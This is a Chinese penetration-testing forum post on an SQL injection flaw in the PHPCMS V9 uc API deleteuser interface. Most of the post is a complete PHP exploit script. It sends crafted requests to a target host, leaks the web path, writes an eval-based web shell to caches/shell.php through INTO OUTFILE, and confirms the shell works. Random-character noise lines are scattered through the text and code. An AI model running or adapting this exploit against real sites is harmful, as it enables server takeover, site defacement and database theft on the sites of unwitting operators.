中国网络渗透测试联盟

标题: PHPCMS V9 uc API SQL注入漏洞 [打印本页]

---

作者: admin    时间: 2013-2-9 01:22
标题: PHPCMS V9 uc API SQL注入漏洞
PHPCMS V9版于2010年推出，是应用较为广泛的建站工具。第三方数据显示，目前使用PHPCMS V9搭建的网站数量多达数十万个，包括联合国儿童基金会等机构网站，以及大批企业网站均使用PHPCMS V9搭建和维护。
# v* C, a" c$ _6 q7 w* ^
所有使用PHPCMSV9搭建的网站均存在SQL注入漏洞，可能使黑客利用漏洞篡改网页、窃取数据库，甚至控制服务器。未启用ucenter服务的情况下，uc_key为空，define('UC_KEY', pc_base::load_config('system', 'uc_key'));deleteuser接口存在SQL注入漏洞。若MYSQL具有权限，可直接get webshell。
2 R: y$ g" D2 B+ B$ Q" T
漏洞分析：
1.未启用ucenter服务的情况下uc_key为空
define('UC_KEY', pc_base::load_config('system', 'uc_key'));
2. deleteuser接口存在SQL注入漏洞，UC算法加密的参数无惧GPC,程序员未意识到$get['ids']会存在SQL注入情况。
    public function deleteuser($get,$post) {
) V& Y  A( P: f/ n. @        pc_base::load_app_func('global', 'admin');
        pc_base::load_app_class('messagequeue', 'admin' , 0);
        $ids = new_stripslashes($get['ids']);
2 e) I% j' E$ t7 Y        $s = $this->member_db->select("ucuserid in ($ids)", "uid");
* A9 E9 \+ B4 t1 @, V0 A  |1 MSQL语句为
SELECT `uid` FROM `phpcmsv9`.`v9_sso_members` WHERE ucuserid in ($ids)

  ^# Z( t" N) T1 ^利用代码，随便拼了个EXP，找路径正则写得很挫有BUG，没有注其他表了，懒得改了，MYSQL有权限的话直接get webshell
3 M* z6 V+ ~1 m* @<?php
/ T8 f% r! i: K8 K/ C4 r3 _print_r('
/ h) \# _( O5 j1 c, W, _0 o---------------------------------------------------------------------------
; @/ W: Y- i8 q& s+ u# u3 k2 SPHPcms (v9 or Old Version) uc api sql injection 0day
by rayh4c#80sec.com
---------------------------------------------------------------------------
% r; y$ {) x$ s5 `2 B3 t');

if ($argc<3) {
    print_r('
---------------------------------------------------------------------------
" F  G: \' A9 [Usage: php '.$argv[0].' host path OPTIONS
host:      target server (ip/hostname)
path:      path to phpcms
Options:
3 n. V* @4 x8 |% E0 O -p[port]:    specify a port other than 80
-P[ip:port]: specify a proxy
1 [2 C6 K3 v" L) fExample:
2 _. I$ y2 o6 ^% H+ aphp '.$argv[0].' localhost /
' U5 \6 u8 W. e6 gphp '.$argv[0].' localhost /phpcms/ -p81
php '.$argv[0].' localhost /phpcms/ -P1.1.1.1:80
7 q6 K/ D* s2 @1 M; {3 J" N---------------------------------------------------------------------------
');
    die;
) Z, P: V3 F. c- O0 K  W1 t; q}

& K6 d9 S. J7 p$ c# @( }error_reporting(7);
1 s& _2 V) J6 T. M! q7 e) O6 Eini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

* c6 n) L2 P. h. Ifunction quick_dump($string)
: P  R+ X/ a% u/ u# I. _{
  $result='';$exa='';$cont=0;
% ?, O- r0 d% }/ G6 b  for ($i=0; $i<=strlen($string)-1; $i++)
7 k! R" Q) F: j" L! h6 k  {
# [/ P. D2 H% c/ K, [8 l" d6 J   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
$ S& }$ P+ a; |   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
: w  z$ h& ^8 |   if (strlen(dechex(ord($string[$i])))==2)
1 E% c8 S- \; {. @+ H/ ?  x   {$exa.=" ".dechex(ord($string[$i]));}
  f+ h$ x9 q7 H/ F3 A* j   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
; M' ^) ]6 f$ _0 s1 N% D' F6 J% @  Y' |  }
return $exa."\r\n".$result;
}
$ G- H# ^( d9 d: o- v) ]$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function send($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
2 @* n% n, Q( v# i: }9 k7 L    $ock=fsockopen(gethostbyname($host),$port);
, c* l: t, b' f$ M    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
9 |" c5 i& P! u8 {' W9 j3 U! S  }
6 {# S0 v1 y5 @" L8 g) C  P1 U; f  else {
3 U8 X/ q3 h' N- M! U6 d        $c = preg_match($proxy_regex,$proxy);
; Q5 F0 f5 a" s0 d. A1 F$ _    if (!$c) {
- q9 C2 H! Q. h% R3 M. u      echo 'Not a valid proxy...';die;
    }
4 C2 U" x3 z  v4 ?& ~    $parts=explode(':',$proxy);
    $parts[1]=(int)$parts[1];
% G& M# U8 z3 d: b" d0 H' H2 ?    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
- b& y. b: ]) L$ }" _* }    $ock=fsockopen($parts[0],$parts[1]);
+ f- b7 M+ F) `4 c4 h. L; K    if (!$ock) {
& n+ J+ W' J! J( L      echo 'No response from proxy...';die;
" g* Z- A+ A7 j. [7 l7 I        }
! r2 ~5 N8 D$ o  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
7 }6 W5 J, r" L  ]# k    }
  K1 m. x/ l+ E4 b1 V" L' j* g  }
# q: j0 Y% ]1 d! ~  else {
    $html='';
+ p6 @+ W/ a' p    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
1 c6 N) c6 l/ G  i8 H    }
  }
  fclose($ock);
}
2 ~' {( g, ?6 K) ?7 v3 D
8 u# b  A+ I+ S, G4 A/ O$host=$argv[1];
$path=$argv[2];
4 v2 b) H, o- E- G3 Q: P- H$port=80;
$proxy="";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
, r" \; P5 m  m8 H  $port=(int)str_replace("-p","",$argv[$i]);
! \; i) E7 q- j' n}
if ($temp=="-P")
1 L+ J" E2 `% d+ M{
8 t9 m: Y9 P% s( u# [; e- i# G' T  $proxy=str_replace("-P","",$argv[$i]);
" x5 t  R- c) T/ H}
}
, x, n0 E! k4 A' C3 `8 Y
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
) i" f/ L1 V  s3 {' J
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {

/ w& d/ h; C* I5 }    $ckey_length = 4;
# K' t& g/ p- f+ L1 O
    $key = md5($key ? $key : '');
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
) L% Z; S8 q) _2 Z5 W3 J    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
$ S0 z( d; H6 M( k# A$ u" v" V2 c
    $cryptkey = $keya.md5($keya.$keyc);
    $key_length = strlen($cryptkey);

    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
- b( Q& I- t& X3 d$ [    $string_length = strlen($string);
, S; i' d" h/ i% ?1 [9 A( N' D
" m" s$ ]1 r8 \* K$ {  O. l9 s* F7 @    $result = '';
' \! [9 I+ O5 e/ \4 a( r9 Q( `$ a    $box = range(0, 255);

    $rndkey = array();
    for($i = 0; $i <= 255; $i++) {
5 K6 D; Q- C7 d        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
4 a1 Y7 h3 B- V. Q# v    }
/ Y# ~9 {* J& T9 c
. m4 F4 h) L3 `    for($j = $i = 0; $i < 256; $i++) {
4 \2 V+ V2 f( H: @' Y; w- P        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
( u2 l7 G  [6 O        $tmp = $box[$i];
4 D# a5 L" Z2 I% s        $box[$i] = $box[$j];
  U* T( [2 d5 o: |        $box[$j] = $tmp;
8 @$ q- g5 v; m( H    }

# }- D1 k3 k4 _, q2 ]8 s" l3 F+ a    for($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
9 Q5 k: W* E5 Z/ d3 `        $j = ($j + $box[$a]) % 256;
- X: {# Q$ S9 n3 d5 j        $tmp = $box[$a];
, A: k% L. E/ w* T/ Z' ^( ]9 D        $box[$a] = $box[$j];
        $box[$j] = $tmp;
; l7 a% H) D, G! Z2 C3 J; D( Z        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
: l# Q/ A* l* z: [0 X8 y* t    }
" I9 `$ S* i# A' z) t/ B6 H
    if($operation == 'DECODE') {
5 O1 h9 Q3 f/ t) L3 o5 @+ n( N        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
$ y2 l  P4 S5 h            return substr($result, 26);
' P# U6 T8 n! ~# y* N        } else {
            return '';
        }
+ I- V  N) ?7 K3 r% V* K+ e    } else {
# O# }% U/ N2 p, _        return $keyc.str_replace('=', '', base64_encode($result));
. G" F+ `* s# m% `    }
. ?. E' f/ p8 z; n0 _" J6 b
$ @  t' b! P4 W- W6 J}
/ z4 l7 \4 D) B2 l0 t, G( E
" ]8 h  }0 A, R; b# Z" }8 k9 H$SQL = "time=999999999999999999999999&ids=1'&action=deleteuser";
$SQL = urlencode(authcode($SQL, "ENCODE", ""));
8 G3 s6 {% B1 N( ~: Z& a) R6 necho "[1] 访问 http://".$host.$p."phpsso_server/api/uc.php?code=".$SQL."\n";
$packet ="GET ".$p."phpsso_server/api/uc.php?code=".$SQL." HTTP/1.0\r\n";
1 g: m% k7 H0 ]/ f$packet.="User-Agent: Mozilla/5.0\r\n";
$packet.="Host: ".$host."\r\n";
$ m) j6 H0 X4 L- x. o& ?/ ^$packet.="Connection: Close\r\n\r\n";
send($packet);
# v& ?2 x: [8 |6 eif(strpos($html,"MySQL Errno") > 0){
echo "[2] 发现存在SQL注入漏洞"."\n";
echo "[3] 访问 http://".$host.$p."phpsso_server/api/logout.php \n";
$packet ="GET ".$p."phpsso_server/api/logout.php"." HTTP/1.0\r\n";
$packet.="User-Agent: Mozilla/5.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
send($packet);
preg_match('/[A-Za-z]?[:]?[\/\x5c][^<^>]+[\/\x5c]phpsso_server[\/\x5c]/',$html, $matches);
2 }1 W) _* E; d- C//print_r($matches);
+ C1 @. T! ^3 d* c( Rif(!empty($matches)){
echo "[4] 得到web路径 " . $matches[0]."\n";
echo "[5] 尝试写入文件 ". str_replace("\\","/",$matches[0]) ."caches/shell.php"."\n";
3 S" o8 A8 t: |( y$SQL = "time=999999999999999999999999&ids=1)";
$SQL.=" and 1=2 union select '<?php eval($"."_REQUEST[a]);?>' into outfile '". str_replace("\\","/",$matches[0]) ."caches/shell.php'#";
( Z: e) x/ ?- Y7 `1 `8 E/ h7 V6 o$SQL.="&action=deleteuser";
$SQL = urlencode(authcode($SQL, "ENCODE", ""));
; d5 Y. F9 _- n4 {/ ]& V1 Kecho "[6] 访问 http://".$host.$p."phpsso_server/api/uc.php?code=".$SQL."\n";
$packet ="GET ".$p."phpsso_server/api/uc.php?code=".$SQL." HTTP/1.0\r\n";
$packet.="User-Agent: Mozilla/5.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
send($packet);
if(strpos($html,"Access denied") > 0){
echo "[-] MYSQL权限过低 禁止写入文件 ";
die;
}
echo "[6] 访问 http://".$host.$p."phpsso_server/caches/shell.php"."\n";
  ]7 y$ _7 z; a1 R% R$packet ="GET ".$p."phpsso_server/caches/shell.php?a=phpinfo(); HTTP/1.0\r\n";
$packet.="User-Agent: Mozilla/5.0\r\n";
6 U( W& z0 A; g0 \, ~% s$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
send($packet);
) i) M; a, c8 d7 J8 j5 ]if(strpos($html,"<title>phpinfo()</title>") > 0){
3 y: v; d; P; w( b- R1 A1 I' P& jecho "[7] 测试phpinfo成功！shell密码是a ! enjoy it ";
. |+ w4 Y$ h1 X; X# a0 k$ a% m' t}
+ Q) K' Y9 A) F9 T" c  i" ]8 C/ d# w}else{
7 ?9 \! G) S$ p* Y- zecho "[-]未取到web路径 ";
/ b+ C; |9 `6 j* p! r* O}
. e- X' f+ ^5 C# k( B" @5 Y1 I}else{
echo "[*]不存在SQL注入漏洞"."\n";
* N" X/ ~" @3 G- o! j; l- r}
" w/ t' L. c* L9 i0 B
?>
* w0 }5 F1 v+ ~. q2 Y1 M: q

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2